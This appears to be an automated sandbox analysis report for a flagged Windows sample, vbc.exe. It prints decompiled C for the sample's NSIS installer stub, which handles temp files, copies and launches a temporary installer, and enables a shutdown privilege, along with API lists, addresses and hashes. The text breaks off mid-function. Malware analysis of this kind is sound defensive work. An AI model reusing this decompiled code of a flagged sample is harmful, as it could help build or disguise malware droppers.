                                                                          MD5 hash:1DA682EC8DCBC375B6E76660EF46D3FD
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Antivirus matches:
                                                                          • Detection: 100%, Joe Sandbox ML
                                                                          Reputation:low

                                                                          Chronological Activities

                                                                          Disassembly

                                                                          Code Analysis

                                                                          Reset < >

                                                                            Analysis Process: vbc.exe PID: 2836 Parent PID: 1124 vbc.exeCOMMON

                                                                            Executed Functions

                                                                            Function 0040352D, Relevance: 81.0, APIs: 34, Strings: 12, Instructions: 450stringfilecomCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 78%
                                                                            			_entry_() {
				WCHAR* _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				int _v24;
				int _v28;
				struct _TOKEN_PRIVILEGES _v40;
				signed char _v42;
				int _v44;
				signed int _v48;
				intOrPtr _v278;
				signed short _v310;
				struct _OSVERSIONINFOW _v324;
				struct _SHFILEINFOW _v1016;
				intOrPtr* _t88;
				intOrPtr* _t94;
				void _t97;
				void* _t116;
				WCHAR* _t118;
				signed int _t119;
				intOrPtr* _t123;
				void* _t137;
				void* _t143;
				void* _t148;
				void* _t152;
				void* _t157;
				signed int _t167;
				void* _t170;
				void* _t175;
				intOrPtr _t177;
				intOrPtr _t178;
				intOrPtr* _t179;
				int _t188;
				void* _t189;
				void* _t198;
				signed int _t204;
				signed int _t209;
				signed int _t214;
				int* _t218;
				signed int _t226;
				signed int _t229;
				CHAR* _t231;
				signed int _t233;
				WCHAR* _t234;

				0x440000 = 0x20;
				_t188 = 0;
				_v24 = 0;
				_v8 = L"Error writing temporary file. Make sure your temp folder is valid.";
				_v20 = 0;
				SetErrorMode(0x8001); // executed
				_v324.szCSDVersion = 0;
				_v48 = 0;
				_v44 = 0;
				_v324.dwOSVersionInfoSize = 0x11c;
				if(GetVersionExW( &_v324) == 0) {
					_v324.dwOSVersionInfoSize = 0x114;
					GetVersionExW( &_v324);
					asm("sbb eax, eax");
					_v42 = 4;
					_v48 =  !( ~(_v324.szCSDVersion - 0x53)) & _v278 + 0xffffffd0;
				}
				if(_v324.dwMajorVersion < 0xa) {
					_v310 = _v310 & 0x00000000;
				}
				 *0x434fb8 = _v324.dwBuildNumber;
				 *0x434fbc = (_v324.dwMajorVersion & 0x0000ffff | _v324.dwMinorVersion & 0x000000ff) << 0x00000010 | _v48 & 0x0000ffff | _v42 & 0x000000ff;
				if( *0x434fbe != 0x600) {
					_t179 = E0040690A(_t188);
					if(_t179 != _t188) {
						 *_t179(0xc00);
					}
				}
				_t231 = "UXTHEME";
				do {
					E0040689A(_t231); // executed
					_t231 =  &(_t231[lstrlenA(_t231) + 1]);
				} while ( *_t231 != 0);
				E0040690A(0xb);
				 *0x434f04 = E0040690A(9);
				_t88 = E0040690A(7);
				if(_t88 != _t188) {
					_t88 =  *_t88(0x1e);
					if(_t88 != 0) {
						 *0x434fbc =  *0x434fbc | 0x00000080;
					}
				}
				__imp__#17();
				__imp__OleInitialize(_t188); // executed
				 *0x434fc0 = _t88;
				SHGetFileInfoW(0x42b228, _t188,  &_v1016, 0x2b4, _t188); // executed
				E0040653D(0x433f00, L"NSIS Error");
				E0040653D(0x440000, GetCommandLineW());
				_t94 = 0x440000;
				_t233 = 0x22;
				 *0x434f00 = 0x400000;
				if( *0x440000 == _t233) {
					_t94 = 0x440002;
				}
				_t198 = CharNextW(E00405E39(_t94, 0x440000));
				_v16 = _t198;
				while(1) {
					_t97 =  *_t198;
					_t251 = _t97 - _t188;
					if(_t97 == _t188) {
						break;
					}
					_t209 = 0x20;
					__eflags = _t97 - _t209;
					if(_t97 != _t209) {
						L17:
						__eflags =  *_t198 - _t233;
						_v12 = _t209;
						if( *_t198 == _t233) {
							_v12 = _t233;
							_t198 = _t198 + 2;
							__eflags = _t198;
						}
						__eflags =  *_t198 - 0x2f;
						if( *_t198 != 0x2f) {
							L32:
							_t198 = E00405E39(_t198, _v12);
							__eflags =  *_t198 - _t233;
							if(__eflags == 0) {
								_t198 = _t198 + 2;
								__eflags = _t198;
							}
							continue;
						} else {
							_t198 = _t198 + 2;
							__eflags =  *_t198 - 0x53;
							if( *_t198 != 0x53) {
								L24:
								asm("cdq");
								asm("cdq");
								_t214 = L"NCRC" & 0x0000ffff;
								asm("cdq");
								_t226 = ( *0x40a2c2 & 0x0000ffff) << 0x00000010 |  *0x40a2c0 & 0x0000ffff | _t214;
								__eflags =  *_t198 - (( *0x40a2be & 0x0000ffff) << 0x00000010 | _t214);
								if( *_t198 != (( *0x40a2be & 0x0000ffff) << 0x00000010 | _t214)) {
									L29:
									asm("cdq");
									asm("cdq");
									_t209 = L" /D=" & 0x0000ffff;
									asm("cdq");
									_t229 = ( *0x40a2b6 & 0x0000ffff) << 0x00000010 |  *0x40a2b4 & 0x0000ffff | _t209;
									__eflags =  *(_t198 - 4) - (( *0x40a2b2 & 0x0000ffff) << 0x00000010 | _t209);
									if( *(_t198 - 4) != (( *0x40a2b2 & 0x0000ffff) << 0x00000010 | _t209)) {
										L31:
										_t233 = 0x22;
										goto L32;
									}
									__eflags =  *_t198 - _t229;
									if( *_t198 == _t229) {
										 *(_t198 - 4) = _t188;
										__eflags = _t198;
										E0040653D(0x440800, _t198);
										L37:
										_t234 = L"C:\\Users\\Albus\\AppData\\Local\\Temp\\";
										GetTempPathW(0x400, _t234);
										_t116 = E004034FC(_t198, _t251);
										_t252 = _t116;
										if(_t116 != 0) {
											L40:
											DeleteFileW(L"1033"); // executed
											_t118 = E0040307D(_t254, _v20); // executed
											_v8 = _t118;
											if(_t118 != _t188) {
												L68:
												ExitProcess(); // executed
												__imp__OleUninitialize(); // executed
												if(_v8 == _t188) {
													if( *0x434f94 == _t188) {
														L77:
														_t119 =  *0x434fac;
														if(_t119 != 0xffffffff) {
															_v24 = _t119;
														}
														ExitProcess(_v24);
													}
													if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v16) != 0) {
														LookupPrivilegeValueW(_t188, L"SeShutdownPrivilege",  &(_v40.Privileges));
														_v40.PrivilegeCount = 1;
														_v28 = 2;
														AdjustTokenPrivileges(_v16, _t188,  &_v40, _t188, _t188, _t188);
													}
													_t123 = E0040690A(4);
													if(_t123 == _t188) {
														L75:
														if(ExitWindowsEx(2, 0x80040002) != 0) {
															goto L77;
														}
														goto L76;
													} else {
														_push(0x80040002);
														_push(0x25);
														_push(_t188);
														_push(_t188);
														_push(_t188);
														if( *_t123() == 0) {
															L76:
															E0040140B(9);
															goto L77;
														}
														goto L75;
													}
												}
												E00405B9D(_v8, 0x200010);
												ExitProcess(2);
											}
											if( *0x434f1c == _t188) {
												L51:
												 *0x434fac =  *0x434fac | 0xffffffff;
												_v24 = E00403BEC(_t264);
												goto L68;
											}
											_t218 = E00405E39(0x440000, _t188);
											if(_t218 < 0x440000) {
												L48:
												_t263 = _t218 - 0x440000;
												_v8 = L"Error launching installer";
												if(_t218 < 0x440000) {
													_t189 = E00405B08(__eflags);
													lstrcatW(_t234, L"~nsu");
													__eflags = _t189;
													if(_t189 != 0) {
														lstrcatW(_t234, "A");
													}
													lstrcatW(_t234, L".tmp");
													_t137 = lstrcmpiW(_t234, 0x441800);
													__eflags = _t137;
													if(_t137 == 0) {
														L67:
														_t188 = 0;
														__eflags = 0;
														goto L68;
													} else {
														__eflags = _t189;
														_push(_t234);
														if(_t189 == 0) {
															E00405AEB();
														} else {
															E00405A6E();
														}
														SetCurrentDirectoryW(_t234);
														__eflags =  *0x440800;
														if( *0x440800 == 0) {
															E0040653D(0x440800, 0x441800);
														}
														E0040653D(0x436000, _v16);
														_t201 = "A" & 0x0000ffff;
														_t143 = ( *0x40a25a & 0x0000ffff) << 0x00000010 | "A" & 0x0000ffff;
														__eflags = _t143;
														_v12 = 0x1a;
														 *0x436800 = _t143;
														do {
															E0040657A(0, 0x42aa28, _t234, 0x42aa28,  *((intOrPtr*)( *0x434f10 + 0x120)));
															DeleteFileW(0x42aa28);
															__eflags = _v8;
															if(_v8 != 0) {
																_t148 = CopyFileW(0x443800, 0x42aa28, 1);
																__eflags = _t148;
																if(_t148 != 0) {
																	E004062FD(_t201, 0x42aa28, 0);
																	E0040657A(0, 0x42aa28, _t234, 0x42aa28,  *((intOrPtr*)( *0x434f10 + 0x124)));
																	_t152 = E00405B20(0x42aa28);
																	__eflags = _t152;
																	if(_t152 != 0) {
																		CloseHandle(_t152);
																		_v8 = 0;
																	}
																}
															}
															 *0x436800 =  *0x436800 + 1;
															_t61 =  &_v12;
															 *_t61 = _v12 - 1;
															__eflags =  *_t61;
														} while ( *_t61 != 0);
														E004062FD(_t201, _t234, 0);
														goto L67;
													}
												}
												 *_t218 = _t188;
												_t221 =  &(_t218[2]);
												_t157 = E00405F14(_t263,  &(_t218[2]));
												_t264 = _t157;
												if(_t157 == 0) {
													goto L68;
												}
												E0040653D(0x440800, _t221);
												E0040653D(0x441000, _t221);
												_v8 = _t188;
												goto L51;
											}
											asm("cdq");
											asm("cdq");
											asm("cdq");
											_t204 = ( *0x40a27e & 0x0000ffff) << 0x00000010 | L" _?=" & 0x0000ffff;
											_t167 = ( *0x40a282 & 0x0000ffff) << 0x00000010 |  *0x40a280 & 0x0000ffff | (_t209 << 0x00000020 |  *0x40a282 & 0x0000ffff) << 0x10;
											while( *_t218 != _t204 || _t218[1] != _t167) {
												_t218 = _t218;
												if(_t218 >= 0x440000) {
													continue;
												}
												break;
											}
											_t188 = 0;
											goto L48;
										}
										GetWindowsDirectoryW(_t234, 0x3fb);
										lstrcatW(_t234, L"\\Temp");
										_t170 = E004034FC(_t198, _t252);
										_t253 = _t170;
										if(_t170 != 0) {
											goto L40;
										}
										GetTempPathW(0x3fc, _t234);
										lstrcatW(_t234, L"Low");
										SetEnvironmentVariableW(L"TEMP", _t234);
										SetEnvironmentVariableW(L"TMP", _t234);
										_t175 = E004034FC(_t198, _t253);
										_t254 = _t175;
										if(_t175 == 0) {
											goto L68;
										}
										goto L40;
									}
									goto L31;
								}
								__eflags =  *((intOrPtr*)(_t198 + 4)) - _t226;
								if( *((intOrPtr*)(_t198 + 4)) != _t226) {
									goto L29;
								}
								_t177 =  *((intOrPtr*)(_t198 + 8));
								__eflags = _t177 - 0x20;
								if(_t177 == 0x20) {
									L28:
									_t36 =  &_v20;
									 *_t36 = _v20 | 0x00000004;
									__eflags =  *_t36;
									goto L29;
								}
								__eflags = _t177 - _t188;
								if(_t177 != _t188) {
									goto L29;
								}
								goto L28;
							}
							_t178 =  *((intOrPtr*)(_t198 + 2));
							__eflags = _t178 - _t209;
							if(_t178 == _t209) {
								L23:
								 *0x434fa0 = 1;
								goto L24;
							}
							__eflags = _t178 - _t188;
							if(_t178 != _t188) {
								goto L24;
							}
							goto L23;
						}
					} else {
						goto L16;
					}
					do {
						L16:
						_t198 = _t198 + 2;
						__eflags =  *_t198 - _t209;
					} while ( *_t198 == _t209);
					goto L17;
				}
				goto L37;
			}















































                                                                            0x0040353b
                                                                            0x0040353c
                                                                            0x00403543
                                                                            0x00403546
                                                                            0x0040354d
                                                                            0x00403550
                                                                            0x00403563
                                                                            0x00403569
                                                                            0x0040356c
                                                                            0x0040356f
                                                                            0x0040357d
                                                                            0x00403585
                                                                            0x00403590
                                                                            0x004035a9
                                                                            0x004035ab
                                                                            0x004035b3
                                                                            0x004035b3
                                                                            0x004035be
                                                                            0x004035c0
                                                                            0x004035c0
                                                                            0x004035d5
                                                                            0x004035fa
                                                                            0x00403608
                                                                            0x0040360b
                                                                            0x00403612
                                                                            0x00403619
                                                                            0x00403619
                                                                            0x00403612
                                                                            0x0040361b
                                                                            0x00403620
                                                                            0x00403621
                                                                            0x0040362d
                                                                            0x00403631
                                                                            0x00403638
                                                                            0x00403646
                                                                            0x0040364b
                                                                            0x00403652
                                                                            0x00403656
                                                                            0x0040365a
                                                                            0x0040365c
                                                                            0x0040365c
                                                                            0x0040365a
                                                                            0x00403663
                                                                            0x0040366a
                                                                            0x00403670
                                                                            0x00403688
                                                                            0x00403698
                                                                            0x004036aa
                                                                            0x004036b1
                                                                            0x004036b3
                                                                            0x004036b4
                                                                            0x004036c5
                                                                            0x004036c9
                                                                            0x004036c9
                                                                            0x004036dc
                                                                            0x004036de
                                                                            0x004037d8
                                                                            0x004037d8
                                                                            0x004037db
                                                                            0x004037de
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004036e8
                                                                            0x004036e9
                                                                            0x004036ec
                                                                            0x004036f5
                                                                            0x004036f5
                                                                            0x004036f8
                                                                            0x004036fb
                                                                            0x004036fe
                                                                            0x00403701
                                                                            0x00403701
                                                                            0x00403701
                                                                            0x00403702
                                                                            0x00403706
                                                                            0x004037c6
                                                                            0x004037cf
                                                                            0x004037d1
                                                                            0x004037d4
                                                                            0x004037d7
                                                                            0x004037d7
                                                                            0x004037d7
                                                                            0x00000000
                                                                            0x0040370c
                                                                            0x0040370d
                                                                            0x0040370e
                                                                            0x00403712
                                                                            0x0040372c
                                                                            0x00403733
                                                                            0x00403746
                                                                            0x00403747
                                                                            0x0040375c
                                                                            0x00403761
                                                                            0x00403763
                                                                            0x00403765
                                                                            0x00403781
                                                                            0x00403788
                                                                            0x0040379b
                                                                            0x0040379c
                                                                            0x004037b1
                                                                            0x004037b7
                                                                            0x004037b9
                                                                            0x004037bb
                                                                            0x004037c3
                                                                            0x004037c5
                                                                            0x00000000
                                                                            0x004037c5
                                                                            0x004037bf
                                                                            0x004037c1
                                                                            0x004037e6
                                                                            0x004037ea
                                                                            0x004037f3
                                                                            0x004037f8
                                                                            0x004037fe
                                                                            0x00403809
                                                                            0x0040380b
                                                                            0x00403810
                                                                            0x00403812
                                                                            0x0040386a
                                                                            0x0040386f
                                                                            0x00403878
                                                                            0x0040387f
                                                                            0x00403882
                                                                            0x00403a59
                                                                            0x00403a59
                                                                            0x00403a5e
                                                                            0x00403a67
                                                                            0x00403a84
                                                                            0x00403afc
                                                                            0x00403afc
                                                                            0x00403b04
                                                                            0x00403b06
                                                                            0x00403b06
                                                                            0x00403b0c
                                                                            0x00403b0c
                                                                            0x00403a9b
                                                                            0x00403aa7
                                                                            0x00403ab8
                                                                            0x00403abf
                                                                            0x00403ac6
                                                                            0x00403ac6
                                                                            0x00403ace
                                                                            0x00403ada
                                                                            0x00403ae8
                                                                            0x00403af3
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00403adc
                                                                            0x00403adc
                                                                            0x00403add
                                                                            0x00403adf
                                                                            0x00403ae0
                                                                            0x00403ae1
                                                                            0x00403ae6
                                                                            0x00403af5
                                                                            0x00403af7
                                                                            0x00000000
                                                                            0x00403af7
                                                                            0x00000000
                                                                            0x00403ae6
                                                                            0x00403ada
                                                                            0x00403a71
                                                                            0x00403a78
                                                                            0x00403a78
                                                                            0x0040388e
                                                                            0x00403935
                                                                            0x00403935
                                                                            0x00403941
                                                                            0x00000000
                                                                            0x00403941
                                                                            0x0040389f
                                                                            0x004038a7
                                                                            0x004038f9
                                                                            0x004038f9
                                                                            0x004038ff
                                                                            0x00403906
                                                                            0x00403954
                                                                            0x00403956
                                                                            0x0040395b
                                                                            0x0040395d
                                                                            0x00403965
                                                                            0x00403965
                                                                            0x00403970
                                                                            0x0040397c
                                                                            0x00403982
                                                                            0x00403984
                                                                            0x00403a57
                                                                            0x00403a57
                                                                            0x00403a57
                                                                            0x00000000
                                                                            0x0040398a
                                                                            0x0040398a
                                                                            0x0040398c
                                                                            0x0040398d
                                                                            0x00403996
                                                                            0x0040398f
                                                                            0x0040398f
                                                                            0x0040398f
                                                                            0x0040399c
                                                                            0x004039a4
                                                                            0x004039ab
                                                                            0x004039b3
                                                                            0x004039b3
                                                                            0x004039c0
                                                                            0x004039cc
                                                                            0x004039d6
                                                                            0x004039d6
                                                                            0x004039d8
                                                                            0x004039df
                                                                            0x004039e9
                                                                            0x004039f5
                                                                            0x004039fb
                                                                            0x00403a01
                                                                            0x00403a04
                                                                            0x00403a0e
                                                                            0x00403a14
                                                                            0x00403a16
                                                                            0x00403a1a
                                                                            0x00403a2b
                                                                            0x00403a31
                                                                            0x00403a36
                                                                            0x00403a38
                                                                            0x00403a3b
                                                                            0x00403a41
                                                                            0x00403a41
                                                                            0x00403a38
                                                                            0x00403a16
                                                                            0x00403a44
                                                                            0x00403a4b
                                                                            0x00403a4b
                                                                            0x00403a4b
                                                                            0x00403a4b
                                                                            0x00403a52
                                                                            0x00000000
                                                                            0x00403a52
                                                                            0x00403984
                                                                            0x00403908
                                                                            0x0040390b
                                                                            0x0040390f
                                                                            0x00403914
                                                                            0x00403916
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00403922
                                                                            0x0040392d
                                                                            0x00403932
                                                                            0x00000000
                                                                            0x00403932
                                                                            0x004038b0
                                                                            0x004038c8
                                                                            0x004038d9
                                                                            0x004038da
                                                                            0x004038de
                                                                            0x004038e0
                                                                            0x004038ee
                                                                            0x004038f5
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004038f5
                                                                            0x004038f7
                                                                            0x00000000
                                                                            0x004038f7
                                                                            0x0040381a
                                                                            0x00403826
                                                                            0x0040382b
                                                                            0x00403830
                                                                            0x00403832
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0040383a
                                                                            0x00403842
                                                                            0x00403853
                                                                            0x0040385b
                                                                            0x0040385d
                                                                            0x00403862
                                                                            0x00403864
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00403864
                                                                            0x00000000
                                                                            0x004037c1
                                                                            0x0040376a
                                                                            0x0040376c
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0040376e
                                                                            0x00403772
                                                                            0x00403776
                                                                            0x0040377d
                                                                            0x0040377d
                                                                            0x0040377d
                                                                            0x0040377d
                                                                            0x00000000
                                                                            0x0040377d
                                                                            0x00403778
                                                                            0x0040377b
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0040377b
                                                                            0x00403714
                                                                            0x00403718
                                                                            0x0040371b
                                                                            0x00403722
                                                                            0x00403722
                                                                            0x00000000
                                                                            0x00403722
                                                                            0x0040371d
                                                                            0x00403720
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00403720
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004036ee
                                                                            0x004036ee
                                                                            0x004036ef
                                                                            0x004036f0
                                                                            0x004036f0
                                                                            0x00000000
                                                                            0x004036ee
                                                                            0x00000000

                                                                            APIs
                                                                            • SetErrorMode.KERNELBASE(00008001), ref: 00403550
                                                                            • GetVersionExW.KERNEL32(?), ref: 00403579
                                                                            • GetVersionExW.KERNEL32(0000011C), ref: 00403590
                                                                            • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403627
                                                                            • #17.COMCTL32(00000007,00000009,0000000B), ref: 00403663
                                                                            • OleInitialize.OLE32(00000000), ref: 0040366A
                                                                            • SHGetFileInfoW.SHELL32(0042B228,00000000,?,000002B4,00000000), ref: 00403688
                                                                            • GetCommandLineW.KERNEL32(00433F00,NSIS Error), ref: 0040369D
                                                                            • CharNextW.USER32(00000000), ref: 004036D6
                                                                            • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\), ref: 00403809
                                                                            • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 0040381A
                                                                            • lstrcatW.KERNEL32 ref: 00403826
                                                                            • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\), ref: 0040383A
                                                                            • lstrcatW.KERNEL32 ref: 00403842
                                                                            • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 00403853
                                                                            • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 0040385B
                                                                            • DeleteFileW.KERNELBASE(1033), ref: 0040386F
                                                                            • lstrcatW.KERNEL32 ref: 00403956
                                                                            • lstrcatW.KERNEL32 ref: 00403965
                                                                              • Part of subcall function 00405AEB: CreateDirectoryW.KERNELBASE(?,00000000,00403520,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00405AF1
                                                                            • lstrcatW.KERNEL32 ref: 00403970
                                                                            • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,00441800,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,00440000,00000000,?), ref: 0040397C
                                                                            • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 0040399C
                                                                            • DeleteFileW.KERNEL32(0042AA28,0042AA28,?,00436000,?), ref: 004039FB
                                                                            • CopyFileW.KERNEL32(00443800,0042AA28,00000001), ref: 00403A0E
                                                                            • CloseHandle.KERNEL32(00000000), ref: 00403A3B
                                                                            • ExitProcess.KERNELBASE(?), ref: 00403A59
                                                                            • OleUninitialize.OLE32 ref: 00403A5E
                                                                            • ExitProcess.KERNEL32 ref: 00403A78
                                                                            • GetCurrentProcess.KERNEL32(00000028,?), ref: 00403A8C
                                                                            • OpenProcessToken.ADVAPI32(00000000), ref: 00403A93
                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403AA7
                                                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00403AC6
                                                                            • ExitWindowsEx.USER32(00000002,80040002), ref: 00403AEB
                                                                            • ExitProcess.KERNEL32 ref: 00403B0C
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.416752440.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.416746515.0000000000400000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416777900.0000000000408000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416787128.000000000040A000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416790388.000000000040D000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416802899.0000000000415000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416806904.000000000041B000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416819547.0000000000427000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416828805.0000000000431000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416833296.0000000000442000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416840722.000000000044C000.00000002.00020000.sdmp Download File
                                                                            Similarity
                                                                            • API ID: Processlstrcat$ExitFile$Directory$CurrentDeleteEnvironmentPathTempTokenVariableVersionWindows$AdjustCharCloseCommandCopyCreateErrorHandleInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesUninitializeValuelstrcmpilstrlen
                                                                            • String ID: .tmp$1033$C:\Users\user\AppData\Local\Temp\$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                                            • API String ID: 2292928366-2607992671
                                                                            • Opcode ID: 8d24a3590c3fa0910ef95ef3363b7165c5538ed9a562f2e07edb708d24b89e61
                                                                            • Instruction ID: 4d4dc0a58e4858e72561def8a0259f0227da8af974c10a5ea2b310ef4b80d7a5
                                                                            • Opcode Fuzzy Hash: 8d24a3590c3fa0910ef95ef3363b7165c5538ed9a562f2e07edb708d24b89e61
                                                                            • Instruction Fuzzy Hash: 66E10670A00214AADB10AFB59D45BAF3AB8EF4470AF14847FF545B22D1DB7C8A41CB6D
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00406873, Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 100%
                                                                            			E00406873(WCHAR* _a4) {
				void* _t2;

				_t2 = FindFirstFileW(_a4, 0x4302b8); // executed
				if(_t2 == 0xffffffff) {
					return 0;
				}
				FindClose(_t2);
				return 0x4302b8;
			}




                                                                            0x0040687e
                                                                            0x00406887
                                                                            0x00000000
                                                                            0x00406894
                                                                            0x0040688a
                                                                            0x00000000

                                                                            APIs
                                                                            • FindFirstFileW.KERNELBASE(74EDD4C4,004302B8,0042FA70,00405F5D,0042FA70,0042FA70,00000000,0042FA70,0042FA70,74EDD4C4,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,74EDD4C4,C:\Users\user\AppData\Local\Temp\), ref: 0040687E
                                                                            • FindClose.KERNEL32(00000000), ref: 0040688A
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.416752440.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.416746515.0000000000400000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416777900.0000000000408000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416787128.000000000040A000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416790388.000000000040D000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416802899.0000000000415000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416806904.000000000041B000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416819547.0000000000427000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416828805.0000000000431000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416833296.0000000000442000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416840722.000000000044C000.00000002.00020000.sdmp Download File
                                                                            Similarity
                                                                            • API ID: Find$CloseFileFirst
                                                                            • String ID:
                                                                            • API String ID: 2295610775-0
                                                                            • Opcode ID: 86d0f84efe5cb21a5e65899ed37e92679b9de560e532c409a12d624e9ae3e839
                                                                            • Instruction ID: 67599a3b69382adcf67454a25bfea179debcebd0a6e2e92eb77ede12202c023a
                                                                            • Opcode Fuzzy Hash: 86d0f84efe5cb21a5e65899ed37e92679b9de560e532c409a12d624e9ae3e839
                                                                            • Instruction Fuzzy Hash: C3D012325192205FC3402B386E0C84B7A989F16331726CB76B4AAF51E0D7388C7387BD
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0040307D, Relevance: 21.2, APIs: 5, Strings: 7, Instructions: 181memoryCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 80%
                                                                            			E0040307D(void* __eflags, signed int _a4) {
				DWORD* _v8;
				DWORD* _v12;
				void* _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _v44;
				signed int _t50;
				void* _t53;
				void* _t57;
				intOrPtr* _t59;
				long _t60;
				signed int _t65;
				signed int _t70;
				signed int _t71;
				signed int _t77;
				intOrPtr _t80;
				long _t82;
				signed int _t85;
				signed int _t87;
				void* _t89;
				signed int _t90;
				signed int _t93;
				void* _t94;

				_t82 = 0;
				_v12 = 0;
				_v8 = 0;
				 *0x434f0c = GetTickCount() + 0x3e8;
				GetModuleFileNameW(0, 0x443800, 0x400);
				_t89 = E0040602D(0x443800, 0x80000000, 3);
				_v16 = _t89;
				 *0x40a018 = _t89;
				if(_t89 == 0xffffffff) {
					return L"Error launching installer";
				}
				E0040653D(0x441800, 0x443800);
				E0040653D(0x444000, E00405E58(0x441800));
				_t50 = GetFileSize(_t89, 0);
				__eflags = _t50;
				 *0x42aa24 = _t50;
				_t93 = _t50;
				if(_t50 <= 0) {
					L24:
					E00403019(1);
					__eflags =  *0x434f14 - _t82;
					if( *0x434f14 == _t82) {
						goto L29;
					}
					__eflags = _v8 - _t82;
					if(_v8 == _t82) {
						L28:
						_t34 =  &_v24; // 0x40387d
						_t53 = GlobalAlloc(0x40,  *_t34); // executed
						_t94 = _t53;
						E004034E5( *0x434f14 + 0x1c);
						_t35 =  &_v24; // 0x40387d
						_push( *_t35);
						_push(_t94);
						_push(_t82);
						_push(0xffffffff); // executed
						_t57 = E004032B4(); // executed
						__eflags = _t57 - _v24;
						if(_t57 == _v24) {
							__eflags = _v44 & 0x00000001;
							 *0x434f10 = _t94;
							 *0x434f18 =  *_t94;
							if((_v44 & 0x00000001) != 0) {
								 *0x434f1c =  *0x434f1c + 1;
								__eflags =  *0x434f1c;
							}
							_t40 = _t94 + 0x44; // 0x44
							_t59 = _t40;
							_t85 = 8;
							do {
								_t59 = _t59 - 8;
								 *_t59 =  *_t59 + _t94;
								_t85 = _t85 - 1;
								__eflags = _t85;
							} while (_t85 != 0);
							_t60 = SetFilePointer(_v16, _t82, _t82, 1); // executed
							 *(_t94 + 0x3c) = _t60;
							E00405FE8(0x434f20, _t94 + 4, 0x40);
							__eflags = 0;
							return 0;
						}
						goto L29;
					}
					E004034E5( *0x41ea18);
					_t65 = E004034CF( &_a4, 4);
					__eflags = _t65;
					if(_t65 == 0) {
						goto L29;
					}
					__eflags = _v12 - _a4;
					if(_v12 != _a4) {
						goto L29;
					}
					goto L28;
				} else {
					do {
						_t90 = _t93;
						asm("sbb eax, eax");
						_t70 = ( ~( *0x434f14) & 0x00007e00) + 0x200;
						__eflags = _t93 - _t70;
						if(_t93 >= _t70) {
							_t90 = _t70;
						}
						_t71 = E004034CF(0x416a18, _t90);
						__eflags = _t71;
						if(_t71 == 0) {
							E00403019(1);
							L29:
